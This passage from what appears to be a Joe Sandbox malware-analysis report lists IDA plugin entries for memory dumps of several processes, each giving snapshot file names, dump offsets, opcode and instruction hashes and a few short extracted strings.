                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a67110cb3ba11069b9143f2c83c216b83b89c88af77e420b964f01b177ef532d
                                • Instruction ID: b1c7aca86f0515070190f29006a53501f0c8ba3458c7787295ef8b285c8556da
                                • Opcode Fuzzy Hash: a67110cb3ba11069b9143f2c83c216b83b89c88af77e420b964f01b177ef532d
                                • Instruction Fuzzy Hash: AE01AD75E0D6999FE706FB3888501AC7FB0FF42390F5945B6C044FB292DA382A498B94
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3395758060.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4865dc93d041830cb1257a3c97077b228f007c519de83a2be346b9101c834d0a
                                • Instruction ID: 5eb70eb6cbec1f0c8cf4390a9dbf077fafb3616101225254c25a8931c5664ce9
                                • Opcode Fuzzy Hash: 4865dc93d041830cb1257a3c97077b228f007c519de83a2be346b9101c834d0a
                                • Instruction Fuzzy Hash: 09019A71D0D689AFE706FB7888401AC7FB0FF42340F5941E6D044EB292EA386A48CB81
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 182311c2ad454eaeb03f72d4ccccd39471739919f2d9ad8f36753b8afe69c489
                                • Instruction ID: 71ef04cb73b875adf059b2a54fc27628ce5c6160fc45120186d16c042d24ca04
                                • Opcode Fuzzy Hash: 182311c2ad454eaeb03f72d4ccccd39471739919f2d9ad8f36753b8afe69c489
                                • Instruction Fuzzy Hash: 18017D3114D2438FE71AEF68C4556E8B7D0EF52360F1442BAE419C72C1CB695940C750
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a6d4d93e3e653adca620f7f937339a5646a0959f500d6e7d0c2d2e39f1e6399
                                • Instruction ID: 5bcb8dab3a5527c6023478879cd384e605f6a248f1d342b57f332af5cfea0a8d
                                • Opcode Fuzzy Hash: 5a6d4d93e3e653adca620f7f937339a5646a0959f500d6e7d0c2d2e39f1e6399
                                • Instruction Fuzzy Hash: 4401FB7090895C9FCF98EF18C894FE9B7B4EBA8325F1401A9D40DE7291DA359AC1CB50
                                Memory Dump Source
                                • Source File: 0000001D.00000002.3402855977.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_7ff849250000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ed673a66f8e1301f58e1655deeeae3869af08fad6cca63fb2768e1a95aab717f
                                • Instruction ID: e63ed1f86feff0dcf3ce2f1eeadde26612cfb96a41406d65efa599ee041b7acb
                                • Opcode Fuzzy Hash: ed673a66f8e1301f58e1655deeeae3869af08fad6cca63fb2768e1a95aab717f
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 7be9a3577a42f7ade3e9d103fc1fc78cb953cf929383176af6965eed19fcb741
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: C3E0E530E0D0168EF765BA98C0003BD22A5AF84390F950079D92DB72D6CE3ABC419648
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: e208448bd1bb2ebfb66f2a53860c5a90da8d5f2f3a53bda66a14e7d049c7ec83
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: 8AD0A73161D54A4FE745B778D8498547B90FB1F310BD920E1D00CC72A1D61458558701
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: df7516600ac512f399ea97404ec5dbcf3026a66fb6dca1ee6322c105892dbaf9
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: 44E01734A0C60ADFE700FB54C4886AEB7A1FB91361F6082A5C401A7289DB78B684CB84
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 6ee8c76bf8097fd72ad07efc031bc94fead778ab448a0daf356bb140b92e30e4
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: 1AC08C01D1E42F08F405B12E14020ACA2007BC42D0FD00032C01C700C29EAD30C5024E
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: 0a3ef425cd6a3e483cf6112a13b8b12f2255a7c9e939f80f6b9675df6606ad5d
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: BCC04C305158098FC954F72DC98595476A0FB0E215BD501D0E40DC7175E66AEC95C745
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: b82c5eda5274fd8e6e0b4412df162d49119f7d3ae3a4052fdd84645068683bd3
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: E9C08C308108088FCA08FB28C88480433A0FB09200BD60090E009C7170E229ECD1C740
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3baa4261d7915c92556e7884fe521a43e4eb5283c46c842d7277fde00c603ff8
                                • Instruction ID: 3ae70bc0065df3ece72cf79118ce6301fe0b40afd11a1e06dc48f151fa1d8ad3
                                • Opcode Fuzzy Hash: 3baa4261d7915c92556e7884fe521a43e4eb5283c46c842d7277fde00c603ff8
                                • Instruction Fuzzy Hash: 2EC08C0AE0DC2A9AE25A6214042027E0802DF80788F885071E00E872CACF1C2A0106CA
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2532120119.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_7ff848e60000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 409f002d9ff6d1b62a327699d874886f2c8ca824da1e9b57baa0e6257bc20c7c
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 9EB01200C6E40F04E408317A08420A471407BC4180FC00070D40C70082999D3094034A
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: dcc0d68abf5b0b3c2ab49b597791ffbcf23c0c5793d40d8cd22d28b5fe74732b
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: F9C04C345558098FC948FB29D88591877A0FF19215BD601D0E409C7171E669DCD5D745
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67270f9e8fa3c4d48be0e5481c0d2ce4387f72774a47408615ccb5a0ae4f2cf0
                                • Instruction ID: 27af6f9c79864d18f9571dfceabc1be7fa2ddb863be8d312eadfea79a3506f9c
                                • Opcode Fuzzy Hash: 67270f9e8fa3c4d48be0e5481c0d2ce4387f72774a47408615ccb5a0ae4f2cf0
                                • Instruction Fuzzy Hash: 0FC08C06E0DC2E9AE2552214042027E0002DF807A5F985071E00E872CACE2C190106CA
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 523bdebfd329f9494f4a36e86845b5334741e8ba2daeaf6a0f0b7ecea0633d04
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 19B01200C5E40F04E40431BA08420AC70407FC4180FC10070D40C41081D97D1095025A
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.2542820507.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ff848e80000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: c9$!k9$"s9$#{9
                                • API String ID: 0-1692736845
                                • Opcode ID: 1faa08c920c1acac1da93e729ba170363ce50425dd1c15349f3f3d149fc2acff
                                • Instruction ID: 7dbab12ab344c891487e757cc4c1567e384ca26d8ebe423f1814e492fe212c8d
                                • Opcode Fuzzy Hash: 1faa08c920c1acac1da93e729ba170363ce50425dd1c15349f3f3d149fc2acff
                                • Instruction Fuzzy Hash: 98413ED6ACE86A7DE21D36BDB4111FD6B44EF812B5F4C93B7E04C891838E18608586FD
                                • Instruction ID: 4993736fcc240f919cad4a1a215fb278bf0b637f79f1f0cf1f8c5c920ef11074
                                • Opcode Fuzzy Hash: 696e16831c8a0c83608f077f1dc9b33155f26f3f6961ca39a436cafc05629c30
                                • Instruction Fuzzy Hash: 66419ED2ACA9633DE10E36FDB4020F96B44EF813B9F4C9677E04C890938F59608586F9
                                Strings
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5\_H
                                • API String ID: 0-3325266018
                                • Opcode ID: 78735a4b9015be14a359b7f0d2ae6f1f99ed70ef193e61ca7d545c3ba4eb741e
                                • Instruction ID: fd8b762e826b9e1e342b13c26e4d11b1941517565821f085006f479847f3cb00
                                • Opcode Fuzzy Hash: 78735a4b9015be14a359b7f0d2ae6f1f99ed70ef193e61ca7d545c3ba4eb741e
                                • Instruction Fuzzy Hash: 0F9120B1D1CA899FE789EF6888697A9BFE0FF56350F0400BAD049D72D6DB782404C720
                                Strings
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: cO_H
                                • API String ID: 0-909493557
                                • Opcode ID: 6e38b298c5ee1f8c36f6d0821c3910340b1e9a9714f98ea80f2b7f44069a9a0f
                                • Instruction ID: 2a0dbd578e1e976917f260bdaf1ba4da8ce37414d93e2e2a9a50f74bd5024b39
                                • Opcode Fuzzy Hash: 6e38b298c5ee1f8c36f6d0821c3910340b1e9a9714f98ea80f2b7f44069a9a0f
                                • Instruction Fuzzy Hash: 2B51F471A0CB044FE748EA5CA856675B7E1FB99760F14057EE08EC3296DF34AC4287C6
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: db1e12f441dadcdb6e5a2a53a4c3e2009bcc184a29547c8afaad61bd48053a2b
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: DD21EA3170CD194FD768EA5CE889DB973D1FF9932170501BAE58EC7126EA21EC8287C5
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15c6646be81774e281b66618215dc3c4b411487ae92fe3def241babcf6bfd30a
                                • Instruction ID: bb703390e30eb0b4cc7a1d99cc15df1ef7a9a91e4cd7ac27b5905d63ec31bb2a
                                • Opcode Fuzzy Hash: 15c6646be81774e281b66618215dc3c4b411487ae92fe3def241babcf6bfd30a
                                • Instruction Fuzzy Hash: 33210420B1CD195FE788B66C545A779B2C2FB99355F1400BAE40EC32DBDF28AC418694
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c6cac3f8c45a64afe919e66e4b9d726ffdf5a4a65d7c14ad357dc54be2e3963
                                • Instruction ID: 34f2fd6948fca409914ab6d78bd809f5bf0d613bced775e7bdb13b79436fe17d
                                • Opcode Fuzzy Hash: 9c6cac3f8c45a64afe919e66e4b9d726ffdf5a4a65d7c14ad357dc54be2e3963
                                • Instruction Fuzzy Hash: 7B31827190C54A8FEB45FB68C854AF9BBF0FF26350F0505BAD009D7292DB39A941CB50
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f5796da5cd3975a5dbae67b88e84963c5b2d14573592ea2d45c1a7673a7e9b0
                                • Instruction ID: a84696708e7e8b5cda5ec5bc44dc6b8333b90a539d76b70a8280888ee99421f1
                                • Opcode Fuzzy Hash: 7f5796da5cd3975a5dbae67b88e84963c5b2d14573592ea2d45c1a7673a7e9b0
                                • Instruction Fuzzy Hash: 3F2107B6D0C649AFF716BBB898510EC7B60FF42360F1841B3E048DB183DA38254A8799
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: 9e1d92b7ea17909ff94cf9be150208c13e34284f6582faa0980c601a1c4c01af
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 6E01FC71F0D91D0FD568E45D954A935F7C6E7C6670B151279E84FC3245DE20AC5342C4
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5f0bcd2f125d4fc4de9257ea26a4a9f04c1e795f85b1caa1d801009ce89bbbe
                                • Instruction ID: 76c0e6252f47db4099085d85f5edd7b8ff329f8c3c1912486bfa26ac5b7193fd
                                • Opcode Fuzzy Hash: d5f0bcd2f125d4fc4de9257ea26a4a9f04c1e795f85b1caa1d801009ce89bbbe
                                • Instruction Fuzzy Hash: F621FC70D0852DCFDBA8EB04C495BAAB3B1FB58355F1041B9C00EA72A5CB75ADC0CB45
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f2c2bae66b53f598dc92e6b467dcd5dadde525fd3e16a4265094a806de8face9
                                • Instruction ID: 347124d804480e39e1dd3eba45831eb7e75aa0c329aecea0573c7405d8eb333f
                                • Opcode Fuzzy Hash: f2c2bae66b53f598dc92e6b467dcd5dadde525fd3e16a4265094a806de8face9
                                • Instruction Fuzzy Hash: BE11A0B1E0C689AFE706FFB888651A8BBB0FF42250F1545B6E044DB192EA3416498794
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 975bf2cb4784d2dd4b30aef1f97b5b9e0894064acc40d8685a71e06e478df7ee
                                • Instruction ID: ef07fed3d19e08da34b1eebd9120c23a4d7cab73e61ec3cb667ddeb304595d83
                                • Opcode Fuzzy Hash: 975bf2cb4784d2dd4b30aef1f97b5b9e0894064acc40d8685a71e06e478df7ee
                                • Instruction Fuzzy Hash: C511E171D0C6899FE706FFB888500A8BFB0FF42350F1541B2E044DB192DA3416498784
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cd84ace66c93516e2ff32e0ac9e110494af291e78f80fdbcb04341d3c9895aa
                                • Instruction ID: ee6aa2306b5b593168268b9397400b6933b772295e04adfb66dc515da0a72698
                                • Opcode Fuzzy Hash: 9cd84ace66c93516e2ff32e0ac9e110494af291e78f80fdbcb04341d3c9895aa
                                • Instruction Fuzzy Hash: DC018C71D0D6899FE706FFB888541A8BFB0FF42340F1541E6E044DB296EA386A49CB85
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be7834a4062989e3dfab369604c39d6f237992473e45b50aba6471ff9f7f81da
                                • Instruction ID: ba2b4253312f481597753603ccee4a05eed4e85fbbc48104a6995f151614dadd
                                • Opcode Fuzzy Hash: be7834a4062989e3dfab369604c39d6f237992473e45b50aba6471ff9f7f81da
                                • Instruction Fuzzy Hash: 01017CB0D0D689AFE706FFB488941ACBFB0FF02340F1441E6E044CB296EA385A48C785
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 89e9858bd42c7874cd54f4bcd00942acccc93cd787e9214600eac03e6a25aa4e
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: F8E01AB0E0D0068FF760FAD8C0003BEA2A5AF84384F150179E92DE72C6CF3AAC418648
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: 1b140a6f5cdeb583bc1deaa5beeaef976f82a692a535772cd175f04ef87adc26
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: 91D0A73161D54A4FE745B778D849854BB90FB1F310BC920E1D00CC7261D61448558701
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: 1f1d33734b0e27c711c3f21474e5e8bbd6b9bd376c00b907a4a7f54cd19e6ae9
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: 19E01774A0C20ADFE700FF94C4846AEB7A1FB92361F208665E40187289DB78A684CA84
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 34c046652ce2802c3b8fdad2710c0c8617ad701e8c2623648c10ac3629bd7f9e
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: A4C08C81D0E40F09F400B9EE14020ECE2007FC42D0FD00032E50C400C1AEAD20C5014E
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: b7a7bee55d5a81f871b32b8e0110d65aadf32885dc8d5458cf9dae2386804b84
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: DBC08C305108088FC940F72CC88481072A0FB0E210BC100E0E00DC7170E22ADCC0C700
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: 5068bf5995ff6246b36239b7abee49f93e809fc33f5b34d3e07617db06c4d9fa
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 32C08C304118088FC908FB28C88480473A0FB09200BC60090E009C7170E229DCC1C740
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48f4c981493638df4bb3b101e0dc4827dfe4db6e48c6c03725eb87796adc607f
                                • Instruction ID: 063182d1f5798a3d3bdbf9eedc3303054932d2900db5a0e3a893d9694481cd6c
                                • Opcode Fuzzy Hash: 48f4c981493638df4bb3b101e0dc4827dfe4db6e48c6c03725eb87796adc607f
                                • Instruction Fuzzy Hash: BFC08C06E0DC2A9AE2552214042027F0002DF80788F585071E00E872CACF1C190106CA
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 3d8a549e766c19a2689fb623471562655cd23d3bedace59be26e18fcedc9024a
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 1AB01240C5E40F04E40431FA08420E4F0407FC4180FC01070E40C40085AA5D1094024A
                                Strings
                                Memory Dump Source
